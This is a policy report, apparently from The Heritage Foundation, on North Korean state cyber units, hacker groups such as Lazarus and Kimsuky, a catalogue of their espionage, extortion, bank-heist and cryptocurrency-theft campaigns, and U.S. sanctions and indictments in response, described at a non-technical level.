North Korea is a direct threat to the security of the United States, its allies, and the international financial system. Pyongyang continues to augment and refine its nuclear, missile, and cyber threats to the United States and its allies. While its kinetic military attacks have been limited in recent years, the regime has freely engaged in an expansive cyber gray-zone war with much lower risk of retaliation than conventional military actions entail. Pyongyang has conducted cyber guerrilla warfare to steal classified military secrets, has absconded with billions of dollars in money and cybercurrency, has held computer systems hostage, and has inflicted extensive damage on computer networks.
Defending against North Korean cyberattacks requires constant vigilance and rapidly evolving methods and techniques of the sort that law enforcement agencies had to use in response to Pyongyang’s improved tactics for evading sanctions. Complacency or a lack of vigor will leave critical government, military, financial, and industry sectors vulnerable to potentially devastating attacks.
Yet the United States has taken only limited actions against North Korean hackers and foreign countries that allow them to operate and launder money from cybercrimes. Without a firm response from the U.S. to North Korea’s hack of Sony and subsequent threat of terrorism, such attacks against the U.S. and its interests will only grow more common.
Bruce Klingner is Senior Research Fellow for Northeast Asia in the Asian Studies Center, of the Kathryn and Shelby Cullom Davis Institute for National Security and Foreign Policy, at The Heritage Foundation.
Appendix 1: North Korean Government Agencies and Subordinate Groups Conducting Cyber Operations
- Reconnaissance General Bureau (RGB). Formed in 2009 during a restructuring of military and intelligence organizations, the RGB is the primary agency responsible for intelligence, clandestine, and terrorist operations. It includes the majority of North Korea’s cyber units with an estimated 6,800 “trained cyber-warfare specialists.” Subordinate units include:
  - Unit 35 (also known as the Central Party Investigative Group), which is responsible for developing malware, identifying opponents’ vulnerabilities, and conducting technical education and training.
  - Unit 91, which is responsible for acquiring information and technology on nuclear development and long-range missiles. It has conducted cyberattacks against the South Korean Ministry of Defense and critical national infrastructure targets such as Korea Hydro and Nuclear Power, which operates nuclear and hydroelectric power plants.
  - Unit 121 (also known as the Cyber Warfare Guidance Unit), which is North Korea’s largest cyber unit and has both intelligence-gathering and attack components. It is responsible for infiltrating computer networks, hacking secret information, and planting viruses to paralyze enemy networks. It is also responsible for attacking infrastructure networks in the transportation, telecommunications, gas, electric and nuclear power, and aviation sectors and may be responsible for Korean People’s Army jamming operations and the disabling of South Korean command, control, and communications structures during an armed conflict. Unit 121 oversees Unit 91; Lab 110, which manages Offices 35, 98, and 414; Unit 180; 128 Liaison Office; and 413 Liaison Office.
  - Lab 110 conducts cyber intelligence missions and cyberattacks against computer command systems. It is believed to have been responsible for the 2009 DDoS attacks against South Korean telecommunications targets. The South Korean National Intelligence Service reported that the unit had received orders to “destroy the South Korean communications networks in an instant.”
  - Unit 180 is responsible for hacking international financial institutions to gain foreign currency to support the regime’s nuclear and ballistic missile programs. It has shifted its focus to targeting cryptocurrency exchanges.
- General Staff Department of the Korean People’s Army (GSD). The GSD focuses on the military applications of cyber operations. Its primary cyber goal is to integrate cyber capabilities into North Korea’s warfighting strategy. The GSD’s cyber responsibilities are divided among its:
  - Operations Bureau, which creates cyber strategy, force planning, and missions.
  - Command Automation Bureau, which conducts cyber warfare operations. Subordinate Units 31, 32, and 56 develop malware, military software, and command-and-control software, respectively.
  - Enemy Collapse Sabotage Bureau, which conducts information and psychological warfare.
- State Security Department Bureau 225. Bureau 225 produces anti–South Korea propaganda to be disseminated through covert networks in China and Japan as well as hundreds of social media sites. According to South Korea’s National Intelligence Service, Pyongyang seeks to manipulate online opinion by posting articles on blogs or sending emails to South Korean journalists. The unit trains agents, conducts infiltration operations in South Korea, and creates underground political organizations in order to incite disorder. It plays a more traditional intelligence and psychological operations role rather than focusing heavily on cyber operations.
- Defense Commission Psychological Operations Department Unit 204. Unit 204 engages in cyber-psychological warfare, espionage, and cyberattacks against South Korea and Western targets.
North Korean–Affiliated Hacker Groups
- Lazarus is the largest and most prevalent of North Korea’s hacker groups. It was created in 2007 and is subordinate to Lab 110 of Bureau 121 of the RGB. It has targeted the aerospace, chemical, electronic, entertainment, financial, government, health care, infrastructure, manufacturing, media, military, publishing, and shipping sectors. It also has targeted North Korean human rights organizations in South Korea and Japan. Lazarus was responsible for many of North Korea’s most audacious cyberattacks, including attacks against South Korean banks in 2013, Sony Pictures Entertainment in 2014, and the WannaCry ransomware attack in 2017.
- Kimsuky was created in 2012 with a global intelligence-gathering mission. The organization has extensively targeted U.S., South Korean, and Japanese individuals, think tanks, government agencies, and other organizations focused on Korean security issues, nuclear policy, and sanctions. Kimsuky seeks access to computers to gain information through social engineering tactics such as phishing, credential and password harvesting, and watering hole attacks.
- Reaper (APT38) targets financial institutions and interbank financial systems to obtain money for the regime. Since 2015, APT38 has been linked to attempts to steal hundreds of millions of dollars from financial institutions, including the Vietnam TP Bank (2015); Bangladesh Bank (2016); Far Eastern International Bank (2017); Bancomext (2018); and Banco de Chile (2018).
- Andariel has conducted cyber espionage and cybercrimes against foreign businesses, defense industries, financial institutions, and government agencies since 2015. It has been linked to hacks into ATMs to withdraw cash and steal customer information that it later sells on the black market. Andariel also has developed malware to hack into online poker and gambling sites.
- Bluenoroff conducts cyber heists to generate revenue and enable the regime to evade sanctions. The group was first noticed in 2014 as part of Pyongyang’s new emphasis on financial targets. Bluenoroff has attempted to steal over $1.1 billion from financial institutions and cryptocurrency exchanges in Bangladesh, India, Mexico, Pakistan, Philippines, South Korea, Taiwan, Turkey, Chile, and Vietnam. In conjunction with the Lazarus group, Bluenoroff stole $81 million from the Central Bank of Bangladesh’s New York Federal Reserve account using stolen SWIFT credentials. An attempt by the two groups to steal an additional $851 million was thwarted by an alert bank officer who noticed a typographical error.
- Chollima consists of “four groups, differing in the objectives and methods of attacks”:
  - Labyrinth Chollima, which “focuses on countering intelligence services”;
  - Ricochet Chollima, which steals user data;
  - Silent Chollima, which “acts against the media and government agencies, primarily in South Korea”; and
  - Stardust Chollima, which “specializes in ‘commercial attacks.’”
Appendix 2: Compendium of North Korean Cyber Attacks
Phase One: Espionage and Disruptive/Destructive Attacks
- North Korea’s first DDoS attack appears to have been Operation Flame, which formed the foundation for subsequent attacks using some of the same identifying encryption keys, malware codes, and techniques.
- Large-scale cyberattacks in South Korea included shutting down 400 computers at the transition office of President Lee Myung-bak.
- Operation Troy involved DDoS, espionage, and disk-wiping attacks against South Korean and U.S. government, military, media outlet, and financial websites. Targets included the White House, U.S. Treasury, U.S. Secret Service, and New York Stock Exchange; the South Korean Blue House, Ministry of Defense, and National Assembly; Shinhan Bank and Korea Exchange Bank; and Naver, South Korea’s top internet portal. The attacks came from 435 different servers in 61 countries around the world.
- Cyberattacks jammed GPS signals at Seoul’s Incheon airport.
- Operation Ten Days of Rain targeted 40 South Korean government, media, and financial websites as well as the networks of U.S. Forces Korea and the U.S. Air Force Base in Kunsan. The attack coincided with the annual combined U.S.-South Korea military exercises. The DDoS attacks were highly destructive, requiring a rebuild of operating systems, applications, and user data.
- DDoS attacks on Seoul’s Incheon Airport. South Korean police arrested a South Korean game distributor who had met with North Korean RGB agents in China to acquire computer games infected with malware. South Koreans who subsequently played the games unwittingly installed the malware on their computers, enabling them to be used as zombie computers in the cyberattack on the airport.
- South Korean police arrested five people for purchasing malware from North Korean hackers to enable illegally gaining points and in-game special items in popular video games that could be converted into real cash. The group was in regular contact with North Korean agents. In less than two years, the group made $6 million, an unknown portion of which was sent to North Korea.
- Large-scale cyberattacks jammed GPS navigation signals for at least 674 commercial air flights and 122 ships, as well as in-car navigation for a week.
- South Korean conservative JoongAng Ilbo newspaper was attacked and its photo and article databases destroyed. North Korea had previously denounced the newspaper’s articles that were critical of the regime and warned that it would stage military attacks against South Korean media companies. Pyongyang responds forcefully to any perceived insults to its leaders.
- Operation Dark Seoul targeted South Korea’s three largest TV broadcasters (KBS, MBC, and YTN) and three major banks (Nonghyup, Shinhan, and Jeju). North Korean malware erased critical records of 40,000 computers, disrupted operations for days, and caused $700 million in damage.
- The Kimsuky group sent spear-phishing emails targeting two South Korean think tanks, the Sejong Institute and Korea Institute for Defense Analyses, as well as human rights groups, the Ministry of Unification, and U.N. officials.
- Operation Desert Wolf targeted the U.S.–South Korean Combined Forces Command, South Korean Joint Chiefs of Staff, and the Defense Integrated Data Center where all South Korean defense information is stored. The hackers infected 3,200 computers and stole 235 gigabytes of classified information. They gained access to the U.S.–South Korean combined Operations Plan 5015 (OPLAN 5015) military strategy for responding to a North Korean invasion, including the decapitation plan to remove Kim Jong-un during wartime, and OPLAN 3100 for responding to North Korean commando attacks.
- North Korea hacked into the South Korean defense industry, stealing and subsequently deleting 42,000 documents, including designs for the F-15 wing and components of a reconnaissance satellite.
- Jamming operations targeting GPS navigation equipment at Seoul’s airports affected 962 planes.
- North Korea hacked dozens of top South Korean government officials’ smartphones and stole text messages and voice communications. Pyongyang also gained access to the Defense Minister’s personal computer and the Defense Ministry’s intranet in order to extract military operations intelligence.
- North Korea gained entry into computers of Daewoo Shipbuilding & Marine Engineering Company and stole blueprints for South Korean warships, including information on the planned 3,000-ton submarine as well as its ballistic missile and vertical launch systems.
- North Korean hackers tried to infiltrate U.S. electric companies’ networks but did not compromise any of the industrial control systems that regulate the supply of power.
- The Kimsuky group conducted multi-year operations targeting the government; national security; aerospace and defense; experts on North Korea, nuclear policy, sanctions, and international relations; academia; and the media. These campaigns have included:
  - Operation Baby Coin against experts on sanctions;
  - Operation Baby Shark against U.S. national security think tanks for information related to Northeast Asia’s national security issues;
  - Operation Kabar Cobra against the Ministry of Unification press corps;
  - Operation Kitty Phishing against the Ministry of Unification press corps;
  - Operation Red Salt against retired South Korean diplomatic, government, and military officials;
  - Operation Stealth Power against U.S. and South Korean experts on North Korea;
  - Operation Smoke Screen against U.S. experts on North Korea; and
  - Operation Stolen Pencil against academic institutions.
- Operation Sharpshooter targeted 87 organizations in 24 countries in the communications, defense, energy, financial, health care, information technology, and infrastructure (energy, gas, nuclear, telecommunications, and transportation) sectors. The hackers masqueraded as job recruiters to induce targets to download infected documents. The recruiting companies, job listings, and recruiter profiles all appeared to be legitimate.
- Operation Ghost Secret was a data-theft campaign to gain intellectual property from companies in critical infrastructure, entertainment, finance, health care, higher education, and telecommunications sectors in 17 countries. The cyber campaign began by targeting a major Turkish government-controlled financial organization, followed by three additional financial institutions, before moving on to global targets.
- North Korea breached computers of the South Korean Ministry of Defense’s Defense Acquisition Program Administration and stole arms procurement plans, including plans for the country’s next-generation fighter aircraft.
- Several computer security firms reported links between North Korea and the Trickbot Group, an Eastern European cybercrime organization, to deploy malware in the first identified cyber collusion between North Korea and non-state actors.
- North Korean hackers breached the nuclear power plant in Kudankulam, India. The Kimsuky group was seeking proprietary information on thorium-based reactors. India is the leader in commercializing the use of thorium as a safer and more efficient alternative to uranium. The hackers also targeted several Indian nuclear physicists and scholars around the world who had published papers on thorium energy.
- North Korean hackers launched phishing attacks against the French, South African, and Slovak ministries of foreign affairs; the U.K.’s Royal United Services Institute think tank; and the U.S. Congressional Research Service.
- The Lazarus group targeted defense industry organizations in at least a dozen countries through spear-phishing emails with malware attachments or links. The malware gathered sensitive information and gained access to the organizations’ restricted networks, which contained mission-critical assets as well as computers with highly sensitive data with no Internet access.
- North Korean hackers attacked Israel’s Ministry of Defense. The government claimed the intrusion was thwarted, but cybersecurity firm ClearSky assessed that the hackers penetrated the ministry’s computer system and stole a large amount of classified information in addition to infecting several dozen companies and organizations both in Israel and around the globe. A similar but less effective campaign targeted Israeli experts in 2019.
- North Korean cyber groups impersonated journalists and news outlets to seed false stories with other reporters to spread disinformation. The hackers used real emails gleaned from experts on North Korea to gain access to the computers of other foreign policy experts, North Korean defectors, and people interested in North Korean refugees. The attacks gained access to contact lists for surveillance and follow-on cyberattacks.
- The Kimsuky group engaged in spear-phishing campaigns against 28 U.N. officials, including six members of the U.N. Security Council. The emails contained malicious attachments or a link redirecting the victim to a site to steal usernames and passwords.
- The Lazarus group targeted cybersecurity experts in the U.S., Europe, and China by posing as researchers seeking to collaborate on cyber threat projects. The hackers created false identities on Twitter, Telegram, Keybase, LinkedIn, and Discord; created followers on those accounts; and populated websites with reports and articles to establish credibility.
- The Kimsuky group hacked into the Korea Atomic Energy Research Institute; Korea Aerospace Industries, a defense firm that is building the KF-21 fighter jet; and Daewoo Shipbuilding & Marine Engineering, which is building submarines and ships for the South Korean navy.
Phase Two: Cyberterrorism, Revenge Attacks, and Extortion
- Operation Blockbuster. North Korea conducted cyberattacks against and sent threatening messages to employees of Sony Pictures Entertainment to prevent the release of its film The Interview, which satirized Kim Jong-un. Pyongyang also threatened “merciless counter-measures” and “9/11-type attacks” against any U.S. theaters showing the film. The cyberattacks and accompanying threats of violent attack met the legal definition of international terrorism contained in the U.S. Code. The regime declared that the film was an “act of war” and had called on both U.N. Secretary General Ban Ki-moon and President Barack Obama to prevent its release. Sony and theater chains quickly withdrew the film, but the hackers still destroyed more than 3,000 computers and 800 servers; extracted the personal records, salary figures, and emails of 6,000 employees; and stole business records, several unreleased movies, and unfinished scripts that were posted on the Internet. Cancelling the film’s release cost Sony an estimated $100 million in lost revenue.
- Revenge Attacks Against Other “Anti-Kim” Film and TV Projects.
  - As a result of the Sony hack and terrorist threats, New Regency announced that it would cancel production of a movie with Steve Carell that was to have been set in North Korea.
  - North Korea similarly attacked Mammoth Screen, the production company for British broadcaster Channel Four, which had announced plans for a 10-part television series, Opposite Number, about a British nuclear scientist kidnapped by North Korea. The cyberattack did not cause any damage, but the project was still cancelled.
- Korea Hydro and Nuclear Power Company. North Korea conducted a series of cyberattacks against South Korean nuclear facilities that led to the disclosure of blueprints for nuclear reactors and personal information of employees. The hackers demanded money and the shutting down of three reactors, threatening to destroy the nuclear facilities and warning nearby residents that it would “be a Fukushima” nuclear disaster. Korea Hydro and Nuclear Power Company, which controls South Korea’s nuclear power plants, reported that its computer systems were breached but that the reactor control systems were not breached.
- WannaCry was the largest ransomware attack in history, infecting more than 300,000 computers in more than 150 countries and causing more than $4 billion in damage. The attack crippled the United Kingdom’s National Health System, affecting one-third of hospitals providing intensive care and other emergency services and 8 percent of general medical practices. The ransomware demanded $300 in Bitcoin per victim, but because of a flaw in the code, only $140,000 in ransom was actually paid.
Phase Three: Cyber Bank Robbery
- An unidentified bank in Guatemala reported a loss of $16 million.
- In December, “having gained unauthorized access to [a] Vietnamese Bank’s computer network,” hackers “conducted false and fraudulent wire transfers totaling approximately €2 million to bank accounts in Slovenia and Bulgaria, and attempted to conduct fraudulent wire transfers of $3.4 million to Russia, A$1 million to Australia, and ¥90 million to Japan.”
- North Korea gained deep access to the computer network of the Bangladesh Bank (Bangladesh’s central bank) to steal approximately $81 million in fraudulent SWIFT transfers from the bank’s accounts in the Federal Reserve Bank of New York to illicit accounts in the Philippines, Sri Lanka, and other banks in Asia. A bank official noticed a typographical error and prevented an additional $851 million from being stolen. The U.S. Federal Reserve Bank authorized five of 35 fraudulent payments.
- $9 million was stolen from Ecuador’s Banco del Austro.
- $18 million was stolen from the Standard Bank of South Africa. The Japanese government stated that the hackers used forged cards with customer information stolen from the Standard Bank of South Africa to withdraw cash from approximately 1,700 ATMs in Tokyo and 16 prefectures across Japan.
- Union Bank of India thwarted a theft of $166 million. Hackers transferred money to banks in Cambodia, Thailand, Taiwan, and Australia, but authorities were able to recover the money.
- There was an attempt to transfer approximately $104.1 million from an unidentified African bank to bank accounts in Taiwan, Thailand, and Cambodia.
- The South Korean online shopping mall Interpark was hacked and blackmailed over stolen customer information. The National Police Agency reported that the hackers forced the transfer of $2.7 million.
- FASTCash Campaign. North Korean hacker groups stole tens of millions of dollars from bank ATMs in Africa and Asia. An attack in 2017 enabled cash withdrawals from ATMs in more than 30 countries, and a similar event in 2018 targeted banks in 23 countries. In 2018, the Cosmos Bank in India was targeted, enabling $13.5 million to be withdrawn in more than 14,000 simultaneous ATM withdrawals by “money mules” with cloned ATM cards in 28 countries as well as in additional transfers to an account belonging to a Hong Kong–based company using SWIFT transfers.
- An attempt was made to steal $60 million from a Tunisian bank.
- An attempt was made to steal approximately $60.1 million from the Far Eastern International Bank of Taiwan and transfer the money to bank accounts in Sri Lanka, Cambodia, and the United States. The bank recovered all but $500,000.
- Approximately $110 million was fraudulently transferred from Mexico’s Banco Nacional de Comercio Exterior (Bancomext) to bank accounts in the Republic of Korea.
- $10 million was transferred from the Banco de Chile to accounts in Hong Kong.
- Approximately $6.1 million was fraudulently withdrawn from BankIslami ATMs in Pakistan.
- An attempt was made to steal $19 million in Costa Rica.
- An attempt was made to steal $16.8 million from India’s City Union Bank.
- An attempt was made to steal $390 million using falsified SWIFT messages in Malaysia.
- An attempt was made to steal $32 million in Liberia.
- An attempt was made to transfer “approximately $6.4 million and €7.1 million [from Malta’s Bank of Valletta] to bank accounts in Hong Kong, the U.K., the United States, and the Czech Republic.” The funds were retrieved.
- There was an attempt to steal $10.8 million in Spain.
- There was an attempt to steal $12.2 million in The Gambia.
- In Nigeria, there was an attempt to steal $9.3 million.
- $49 million was stolen in Kuwait.
Phase Four: Cryptocurrency Exchanges
- Bithumb (South Korea) was attacked at least four times. Attacks in February and July 2017 netted $7 million or more each, and subsequent attacks in June 2018 and March 2019 netted $31 million and $20 million, respectively.
- Youbit (South Korea) suffered multiple attacks involving a $4.8 million loss in April 2017 and then 17 percent of its overall assets in December 2017, forcing the exchange to file for bankruptcy.
- Monero (South Korea) lost $25,000 from cryptojacking.
- Coinis (South Korea) lost $2.19 million.
- NiceHash (Slovenia) lost more than $70 million.
- South Korean Cryptocurrency Company refused to pay a ransom of $16 million in cryptocurrency, so North Korean hackers released confidential customer information.
- North Korean hackers extorted approximately $2.3 million in cryptocurrency from Central American Online Casino 1 and approximately $361,500 in cryptocurrency from Central American Online Casino 2 to prevent the release of confidential customer information.
- In Operation AppleJeus, North Korean hackers created a fake cryptocurrency company to deliver malware by means of a disguised regular application update to targets in China, the U.K., Poland, and Russia. The virus enabled the attacker to gain full control of the users’ device and steal cryptocurrency.
- The theft of $13 million was reported in India.
- In Bangladesh, an attempt was made to steal $2.6 million.
- In Japan, Coincheck declared that $532 million was stolen.
- North Korean groups hacked into an unidentified digital currency exchange and stole nearly $250 million worth of digital currency. Two Chinese nationals who laundered the assets on behalf of the North Korean group received approximately $91 million (in addition to $9.5 million from a hack of another exchange).
- The Indonesian Cryptocurrency Company was victimized by the fraudulent transfers of approximately $24.9 million in cryptocurrency.
- Dragonex (Thailand, Singapore, and Hong Kong) reported the theft of $7 million.
- UpBit (South Korea) lost $49 million.
- The Lazarus Group stole $275 million from the KuCoin currency exchange. KuCoin’s CEO stated that the exchange recovered $204 million worth of the stolen funds.
- New York Financial Services Company lost approximately $11.8 million through fraudulent transfers of cryptocurrency.
Phase Five: Alternative Currencies and DeFis
After successfully hacking into a financial target, operatives must eventually convert cryptocurrency into real currency and launder it to avoid detection. Cybersecurity experts have identified North Korean hackers moving money through hundreds or thousands of separate transactions in numerous countries to launder it before cashing out.
In 2019, North Korea began to use decentralized finance (DeFi) platforms and decentralized cryptocurrency exchanges (DEX) to launder cryptocurrency. The Lazarus group’s use of DeFi platforms nearly doubled in 2020 as its use of mainstream cryptocurrency exchanges decreased. The shift reflects North Korea’s money-laundering adaptability in response to increasing security protocols or law enforcement focus on existing platforms. CipherTrace, a crypto intelligence company, assessed that cryptocurrency thefts and hacks declined in 2020 due to increased security procedures but that hacks against DeFis increased.
Phase Six: Pharmaceutical Companies
North Korea took advantage of the COVID-19 crisis to target pharmaceutical companies for proprietary information on vaccine production as well as individuals and businesses seeking COVID relief funding.
In 2020, the Lazarus group planned a large-scale phishing campaign against more than 5 million individuals and businesses in India, Japan, Singapore, South Korea, the U.K., and the United States. The hackers would pose as local authorities dispersing government COVID support funds and direct the targets to fake websites where they would divulge personal and financial information.
North Korean hackers targeted at least six pharmaceutical companies in the U.S., the U.K., and South Korea that were working on COVID treatments, including Johnson & Johnson, Novavax, AstraZeneca, Genexine, Shin Poong, and Celltrion. It was unclear whether North Korea was attempting to create its own vaccine or to sell obtained vaccine information to a foreign pharmaceutical company. In some cases, the hackers sent spear-phishing emails representing themselves as job recruiters or World Health Organization representatives.
The Lazarus group also targeted government agencies conducting COVID research, including the U.S. Department of Health and Human Services and the European Medicines Agency. The Kaspersky computer security company assessed that some computers at government agencies and companies had been breached.
In 2021, a member of the South Korean National Assembly asserted that intelligence reporting indicated that North Korea had targeted Pfizer to gain COVID vaccine information. It was uncertain whether the attack was successful.
Appendix 3: U.S. Government Responses to the North Korean Cyber Threat
In recent years, the U.S. government has issued numerous warning notices to highlight the growing danger of North Korean cyberattacks. The notices provide detailed technical information to enable companies and financial institutions to develop defensive responses. Washington also has issued indictments and imposed sanctions on North Korean individuals and entities in response to illicit cyber activities. Specifically:
- In January 2015, in response to the Sony hack, the U.S. Treasury Department imposed sanctions on the Reconnaissance General Bureau.
- In 2016, the United States designated North Korea as a money-laundering concern, precluding it from accessing the U.S. financial system for international financial transactions.
- In September 2018, the Treasury Department’s Office of Foreign Assets Control (OFAC) and the Department of Justice sanctioned and unsealed criminal charges against Park Jin-hyok and the Chosun Expo Joint Venture for their involvement in the Sony hack, Bangladesh bank robbery, and WannaCry ransomware attack.
- In June 2019, the U.S. District Court for the District of Columbia upheld, and the U.S. Court of Appeals for the D.C. Circuit subsequently affirmed, the U.S. government’s authority under the Patriot Act to subpoena records from foreign banks with correspondent accounts in the United States, and to cut off a non-compliant foreign bank’s access to the U.S. financial system and dollar-denominated transactions. The ruling arose from a Chinese company’s use of three Chinese banks to launder millions of dollars on behalf of North Korea’s sanctioned Foreign Trade Bank. The court ruling “caused a ripple effect throughout the Chinese financial sector. Stock prices for the three banks…plummeted shortly after the publication of the circuit court’s opinion.”
- In September 2019, OFAC announced sanctions against the Lazarus, Andariel, and Bluenoroff hacking groups for cyberattacks to support North Korea’s illicit nuclear and missile programs. The legal action blocks any property or interests of these entities in the United States. Any transactions by U.S. persons or foreign financial institutions using correspondent accounts in the United States would be subject to sanctions.
- In February 2020, the Pentagon, the FBI, and the Department of Homeland Security issued a series of messages warning of a North Korean cyber-espionage hacking campaign to “conduct illegal activity, steal funds & evade sanctions.”
- In March 2020, a grand jury indicted, and the Treasury Department imposed sanctions on, two Chinese nationals (Tian Yinyin and Li Jiadong) for laundering more than $100 million in cryptocurrency stolen by North Korean agents in a 2018 hack of a cryptocurrency exchange that netted roughly $250 million. The two were also linked to a North Korean theft of $48.5 million from a South Korean cryptocurrency exchange in 2019.
- In May 2020, the Justice Department charged 28 North Korean and five Chinese individuals with laundering more than $2.5 billion in illegal payments for Pyongyang’s nuclear weapons and missile programs. The unsealed indictment accused the individuals of acting as agents of North Korea’s Foreign Trade Bank, the regime’s primary foreign currency bank and under U.S. sanctions for facilitating nuclear proliferation. The case was the largest U.S. sanctions violations case against North Korea and reveals the extent to which the United States believes China has assisted North Korea’s illicit network to evade international sanctions.
- In August 2020, the U.S. government warned of a North Korean group targeting government defense contractors to gather intelligence surrounding key military and energy technologies. The group used fake job postings from leading defense contractors as lures to install a data-gathering implant on the victim's system.
- In August 2020, the U.S. Department of Justice filed a civil complaint for forfeiture of 280 cryptocurrency accounts linked to North Korean hacking of two cryptocurrency exchanges in July 2019 and September 2019 that netted millions of dollars’ worth of cryptocurrency for the regime. “The complaint follows related criminal and civil actions announced in March 2020 pertaining to the theft of $250 million in cryptocurrency through other exchange hacks by North Korean actors” and “exposes the ongoing connections between North Korea’s cyber-hacking program and a Chinese cryptocurrency money laundering network.”
- In August 2020, the U.S. government issued a warning about fraudulent ATM cash-outs by the North Korean–linked BeagleBoyz group through the FASTCash scheme, in which the attackers compromise a bank’s payment-switch servers so that fraudulent ATM withdrawal requests are approved regardless of the account balance. In February 2020, North Korea had resumed targeting banks in multiple countries for fraudulent international money transfers and ATM cash-outs, ending “a lull in bank targeting since late 2019.” BeagleBoyz overlaps with other North Korean cyber groups and has attempted to steal nearly $2 billion since at least 2015.
- In September 2020, leaked U.S. government documents revealed that North Korea laundered $174.8 million in illicit funds from 2008 to 2017 through prominent U.S. banks in New York, including JP Morgan Chase and Bank of New York Mellon. The documents also showed that Chinese companies were involved.
- In October 2020, the U.S. government issued a warning alert on North Korean cyber group Kimsuky. The U.S. said the group was “engaged in ongoing cyber operations against worldwide targets to gain intelligence for North Korea, specifically on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.” The group specifically targets experts, think tanks, and government agencies in South Korea, Japan, and the United States.
- In February 2021, the U.S. government issued an alert about the Lazarus group’s targeting of individuals and companies, including cryptocurrency exchanges and financial service companies, with malware to steal cryptocurrency. Lazarus targeted cryptocurrency organizations in more than 30 countries during 2020 with a malware family referred to as AppleJeus. Since at least 2018, North Korea has distributed AppleJeus as a trojanized cryptocurrency trading application: the installer appears to come from a legitimate trading company and is downloaded from a professional-looking website built for the purpose, so the victim installs a functional-looking trading client that carries the implant. Lazarus also uses phishing, social networking, and other social-engineering techniques to lure users into downloading the malware.
- In February 2021, the U.S. government unsealed a December 2020 indictment against three North Korean hackers (Jon Chang-hyok, Kim Il, and Park Jin-hyok) accused of committing a series of cyberattacks and attempting to steal or extort more than $1.3 billion worth of money and cryptocurrency through cyber heists and fraudulent ATM cash-outs. The case was an expansion of the 2018 case involving the Sony and WannaCry hacks. In an accompanying case, a Canadian-American citizen pleaded guilty to laundering money for the hackers.
- In March 2021, for the first time, the U.S. extradited a North Korean intelligence operative from overseas. Mun Chol-myong, affiliated with the Reconnaissance General Bureau, was accused of defrauding banks and laundering money through the U.S. financial system “in transactions valued at over $1.5 million” by using “a web of front companies and bank accounts registered to false names and remov[ing] references to [North Korea] from international wire transfer and transactional documents.”